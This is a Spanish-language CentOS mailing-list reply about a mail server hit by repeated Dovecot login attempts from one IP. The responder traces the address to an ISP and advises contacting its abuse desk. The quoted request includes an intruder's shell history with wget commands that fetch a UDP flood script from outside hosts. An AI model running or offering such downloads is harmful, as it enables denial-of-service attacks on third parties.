Hola, Le 21/03/2013 16:55, Luis Alberto Roman Aguirre a écrit : > Buenos días a todos de la lista: > Primero que nada les cuento la experiencia que estoy pasando con mi > servidor de correos (postfix,dovecot+sasl), hace un mes aproximadamente he > notado que el servidor a las 5:00PM es atacado/escaneado o algo asi > tratando de conectarse al dovecot especificamente ,les posteo lo que > sale...--------------------- pam_unix Begin > ------------------------ > > dovecot: > > Authentication > Failures: > > contacto > rhost=66.142.38.137 : 88 Time(s) > >
[...] > turismo > rhost=66.142.38.137 : 57 Time(s) .......... ................. > ............(hay mas resgisto q no lo pongo es bastante todos salen de > la misma ip) Unknown Entries: > > check pass; > user unknown: 3901 Time(s) > Al parecer es un diccionario que prueba esos usuarios para ingresar al > dovecot o bien al postfix.esto ya me pasa desde ya hace un mes y no puedo > detectar como y donde se ejecuta, pero si averigue que hicieron y que se > bajaron para realizar esto. > el cual detallo, yo uso un Centos 6.0 64 bits, fue un usuario interno con > conocimiento basicos de linux ( al menos eso creo ) se conecto y hizo eso, > (lo saque del history)wget http://y2khom3.evonet.ro/udp.plwget > www.buble.biz/alinftp/udp.plwget www.packetstormsecurity.org/DoS/udp.plping > www.google.com.peps xcd /tmpls -awpasswd mcondeexit > El detalle es que desde ese momento ya tengo el problema que les comente > lineas arriba.. a alguien de ustedes la ha pasado de casualidad lo mismo? > espero me puedan alguna señal de como detectar de donde se ejecuta dicho > escaneo .si esta en mi server y siempre se ejecuta a esa hora?? o es un > scaneo externo. > Saludos > Luis Roman > Como te ha respondido José Fernández los logs muestran intentos de conexión desde la IP 66.142.38.137. Parece ser que se trata de una ADSL de un proveedor de Internet del suroeste de los EEUU, SouthWestern Bell, que a su vez parece ser propiedad de AT&T: adsl-66-142-38-137.dsl.kscymo.swbell.net Si siempre es esta IP la que trata de acceder a tu servidor contacta con ellos, tienen una cuenta de correo para estos casos. Escríbeles a ab...@swbell.net y explícales el problema. Deberían poner remedio. http://public.swbell.net/contact.html Saludos. -- Francesc Guitart _______________________________________________ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es
